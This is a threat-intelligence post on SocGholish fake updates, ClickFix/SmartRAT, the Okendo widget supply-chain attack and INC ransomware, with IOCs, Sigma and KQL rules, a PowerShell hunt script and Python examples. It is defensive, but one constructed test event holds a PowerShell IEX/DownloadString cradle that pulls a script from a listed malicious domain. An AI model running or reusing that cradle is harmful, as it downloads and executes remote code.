SocGholish Fake Updates, SmartRAT ClickFix & Infostealer Supply Chain: OTX Pulse Analysis

Security Arsenal Team
June 20, 2026

Threat Summary

Recent OTX pulses indicate a convergence of high-risk initial access vectors leading to credential theft and ransomware. The ecosystem remains active despite Operation Endgame disruptions to SocGholish (TA569), with indicators showing residual infrastructure and evolving tactics. Threat actors are increasingly relying on "ClickFix" techniques—fake browser updates and CAPTCHA screens—to deceive users into executing malicious PowerShell scripts, delivering SmartRAT and Banana RAT. Simultaneously, a significant supply chain attack has been identified targeting the Okendo Reviews widget, impacting over 18,000 e-commerce brands by injecting malicious JavaScript loaders for NetSupport and SmartRAT. Additionally, INC ransomware has matured into a top-tier Rust-based RaaS operation, leveraging double-extortion and cross-platform capabilities, while general infostealer trends show a heavy reliance on cracked software distributing LummaC2 and AgentTesla.

Threat Actor / Malware Profile

Adversaries

  • GOLD PRELUDE (TA569): Historically operates SocGholish, utilizing SEO poisoning and compromised WordPress sites to distribute fake browser updates.
  • SmartApeSG: Identified in the Okendo supply chain attack, injecting malicious JavaScript into legitimate third-party widgets.
  • INC Ransomware: A rapidly evolving RaaS group capitalizing on the void left by LockBit/BlackCat, utilizing Rust-based encryptors for Windows and Linux/ESXi.

Malware Families

  • SocGholish: A malware framework (JScript) serving as a loader for IcedID, Pikabot, and Bumblebee. It relies on social engineering via fake browser update prompts.
  • SmartRAT: A PowerShell-based banking trojan and RAT featuring encrypted C2 communications, often distributed via ClickFix campaigns.
  • LummaC2 / AgentTesla: Prevalent infostealers distributed via typosquatting domains and malicious S3 buckets, focusing on harvesting browser credentials and system information.

TTPs & Attack Chain

  1. Initial Access:
    • Drive-by Compromise: Compromised WordPress sites serving fake browser updates (SocGholish).
    • Supply Chain Compromise: Malicious JS injection in trusted third-party widgets (Okendo).
    • Social Engineering: Typosquatting domains with fake CAPTCHAs/BSODs (ClickFix) triggering PowerShell execution.
  2. Execution: Malicious JScript (SocGholish) or PowerShell commands (ClickFix) download and execute payloads.
  3. Persistence: Malware establishes persistence via scheduled tasks or DLL side-loading.
  4. Objectives: Credential theft (banking, corporate), lateral movement, and deployment of ransomware (INC, LockBit) for extortion.

IOC Analysis

The provided pulses contain a mix of network and file-based indicators critical for detection:

  • Hostnames & Domains: A list of compromised WordPress sites (e.g., trademark.iglesiaelarca.com) acting as SocGholish redirectors, and typosquatted domains (e.g., windowsupdate-cdn.com, crefisa.online) used in ClickFix campaigns.
  • URLs: Specific endpoints used in the Okendo supply chain attack (e.g., api.wigetticks.com) facilitating data exfiltration or payload staging.
  • File Hashes: SHA256 and MD5 hashes associated with INC ransomware payloads, loaders, and infostealers (LummaC2).

Operational Guidance: SOC teams should immediately block the listed hostnames and domains at the perimeter. File hashes should be loaded into the EDR's custom indicator or block list so they are alerted on and blocked (not into exclusion lists, which would suppress scanning of exactly those files). The Okendo-related URLs require inspection of web proxy logs to identify internal hosts reaching out to these C2 domains, since any such host is a candidate for compromise.

Detection Engineering

Sigma Rules

YAML
title: Suspicious PowerShell Execution via Browser (ClickFix)
id: 9d87a2e1-5f3c-4b9a-9a5e-4a4e5c5d6e7f
description: Detects PowerShell spawned by a browser process with encoded commands, indicative of ClickFix or fake update campaigns.
status: experimental
date: 2026/06/20
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6428... # ClickFix Pulse
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - \chrome.exe
            - \msedge.exe
            - \firefox.exe
        Image|endswith: \powershell.exe
        CommandLine|contains:
            - -enc
            - -encodedcommand
            - DownloadString
            - IEX
    condition: selection
falsepositives:
    - Legitimate administrative scripts
level: high
---
title: SocGholish Fake Browser Update Pattern
date: 2026/06/20
id: b1c2d3e4-f5a6-4b7c-8d9e-0f1a2b3c4d5e
description: Detects execution of mshta.exe or wscript.exe by a browser, typical of Fake Browser Update campaigns.
status: experimental
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427... # SocGholish Pulse
tags:
    - attack.initial_access
    - attack.t1189
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - \chrome.exe
            - \msedge.exe
            - \firefox.exe
        Image|endswith:
            - \mshta.exe
            - \wscript.exe
            - \cscript.exe
    condition: selection
falsepositives:
    - Low
level: critical
---
title: Okendo Supply Chain C2 Communication
date: 2026/06/20
id: e5f6g7h8-i9j0-4k1l-m2n3-o4p5q6r7s8t9
description: Detects network connections to known malicious domains associated with the Okendo Reviews widget supply chain attack.
status: experimental
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6429... # Okendo Pulse
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - wigetticks.com
            - wizzleticks.com
    condition: selection
falsepositives:
    - None
level: critical
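
To show how the two process_creation rules above behave on real events, here is an added Python example (not part of the original write-up) that applies the same browser-parent / script-host-child logic to constructed Sysmon-style events. It also decodes the -EncodedCommand blob, so tokens such as IEX and DownloadString, which the first Sigma rule can only match in clear text, are still surfaced when the command is base64-encoded. Field names, sample paths and the decoded payload are assumptions.

```python
import base64
import re

BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")
SCRIPT_HOSTS = ("powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe")
SUSPICIOUS_TOKENS = ("iex", "downloadstring", "invoke-expression", "frombase64string")
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")  # -e/-enc/-encodedcommand <b64>

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Mirror the two process_creation Sigma rules above, adding -enc decoding."""
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if parent not in BROWSERS or image not in SCRIPT_HOSTS:
        return None
    if image != "powershell.exe":
        return "socgholish_fake_update"  # browser -> mshta/wscript/cscript
    decoded = decode_encoded_command(event["CommandLine"]) or ""
    haystack = (event["CommandLine"] + " " + decoded).lower()
    if decoded or any(tok in haystack for tok in SUSPICIOUS_TOKENS):
        return "clickfix_powershell"
    return None

def run_detections(events):
    """Return [(rule, decoded_payload_or_None)] for every matching event."""
    return [(classify(ev), decode_encoded_command(ev["CommandLine"]))
            for ev in events if classify(ev)]

# Constructed sample events (Sysmon-style fields), not real telemetry.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://windowsupdate-cdn.com/u.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": PS_EXE, "CommandLine": "powershell.exe -w hidden -enc " + ENCODED},
    {"ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": r"mshta.exe C:\Users\u\Downloads\Update.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: not spawned by a browser
     "Image": PS_EXE, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]
```

Running `run_detections(SAMPLE_EVENTS)` flags the first two events and returns the decoded PowerShell for the first, which is where the known IOC domain becomes visible to the analyst.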

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and Fake Update process patterns
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| where FileName in~ ("powershell.exe", "mshta.exe", "wscript.exe", "cmd.exe")
| extend EncodedCommand = iff(ProcessCommandLine contains "-enc" or ProcessCommandLine contains "-encodedcommand", "Yes", "No")
// Keep every browser-spawned script host; for PowerShell require an encoded command so routine admin scripts drop out
| where FileName !~ "powershell.exe" or EncodedCommand == "Yes"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, EncodedCommand

PowerShell Hunt Script

PowerShell
# IOC Scanner for SocGholish, ClickFix, and Okendo Indicators
$MaliciousHosts = @(
    "trademark.iglesiaelarca.com",
    "windowsupdate-cdn.com",
    "crefisa.online",
    "api.wigetticks.com",
    "api.wizzleticks.com"
)

Write-Host "Checking DNS Cache for malicious host resolution..."
$DnsCache = Get-DnsClientCache
# $Host is a read-only automatic variable in PowerShell, so the loop variable needs another name
foreach ($Indicator in $MaliciousHosts) {
    $Found = $DnsCache | Where-Object { $_.Entry -like "*$Indicator*" }
    foreach ($Entry in $Found) {
        Write-Warning "[ALERT] Found malicious DNS entry: $($Entry.Entry) - IP: $($Entry.Data)"
    }
}

Write-Host "Checking for suspicious process parent-child relationships (Browser -> script host)..."
# Snapshot the process list once so parent lookups do not re-query WMI/CIM for every process
$AllProcs = Get-CimInstance Win32_Process
$SuspiciousProcs = $AllProcs | Where-Object {
    $_.ParentProcessId -ne 0 -and
    ($_.Name -in @("powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"))
}

foreach ($Proc in $SuspiciousProcs) {
    $Parent = $AllProcs | Where-Object { $_.ProcessId -eq $Proc.ParentProcessId }
    # Parent PIDs can be reused after the parent exits, so only alert when the parent is still a live browser
    if ($Parent -and $Parent.Name -match "^(chrome|msedge|firefox)\.exe$") {
        Write-Warning "[ALERT] Suspicious execution: $($Parent.Name) spawned $($Proc.Name) (PID: $($Proc.ProcessId)) - CommandLine: $($Proc.CommandLine)"
    }
}

Response Priorities

Immediate

  • Block IOCs: Implement network blocks for all listed hostnames, domains, and IP addresses at the firewall and proxy level.
  • Hunt Artifacts: Execute the provided PowerShell script across endpoints to identify active DNS cache entries or process anomalies indicative of infection.

24 Hours

  • Credential Reset: If infection is suspected (SmartRAT, LummaC2), force a password reset for all accounts accessed from affected endpoints, prioritizing finance and admin credentials.
  • Web Proxy Analysis: Review proxy logs for connections to the Okendo-related URLs (wigetticks.com, wizzleticks.com) to identify scope of supply chain compromise.

1 Week

  • Supply Chain Governance: Audit all third-party JavaScript libraries and widgets (e.g., Okendo) running on public-facing websites. Implement Subresource Integrity (SRI) where possible.
  • Browser Hardening: Deploy policies to restrict automatic downloads and script execution from the internet, and configure browser security settings to block unsigned/malicious extensions.
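
Added example (not from the original post) showing what the Subresource Integrity recommendation above means in practice: computing the integrity attribute for a pinned copy of a third-party widget and checking that any altered copy fails it, which is what stops a swapped widget like the one in the Okendo incident from loading. The widget bodies and the URL are constructed stand-ins, not Okendo's code.

```python
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digests the SRI spec allows

def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity attribute value for a script body, e.g. 'sha384-<base64>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"

def sri_matches(content: bytes, integrity: str) -> bool:
    """Simplified browser check: the fetched body must match at least one listed token.
    (A real browser only considers the strongest algorithm present in the attribute.)"""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGOS and sri_hash(content, algo) == token:
            return True
    return False

def script_tag(src: str, content: bytes) -> str:
    """Emit the <script> tag to embed; crossorigin is required for SRI on cross-origin scripts."""
    return f'<script src="{src}" integrity="{sri_hash(content)}" crossorigin="anonymous"></script>'

# Constructed stand-in for the vendored review widget; not the vendor's real code.
PINNED_WIDGET = b"(function(){window.reviewsWidget={render:function(el){el.textContent='reviews';}};})();\n"
# Constructed stand-in for a tampered copy served later from the same URL.
TAMPERED_WIDGET = PINNED_WIDGET + b"// a single appended byte is enough to break the pinned hash\n"

def demo():
    """Return (pinned_passes, tampered_passes) for the pinned integrity value."""
    integrity = sri_hash(PINNED_WIDGET)
    return sri_matches(PINNED_WIDGET, integrity), sri_matches(TAMPERED_WIDGET, integrity)
```

SRI fails closed: when the vendor ships a new version the pinned hash must be updated or the widget stops loading, so it suits versioned, immutable asset URLs rather than scripts the vendor rewrites in place.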
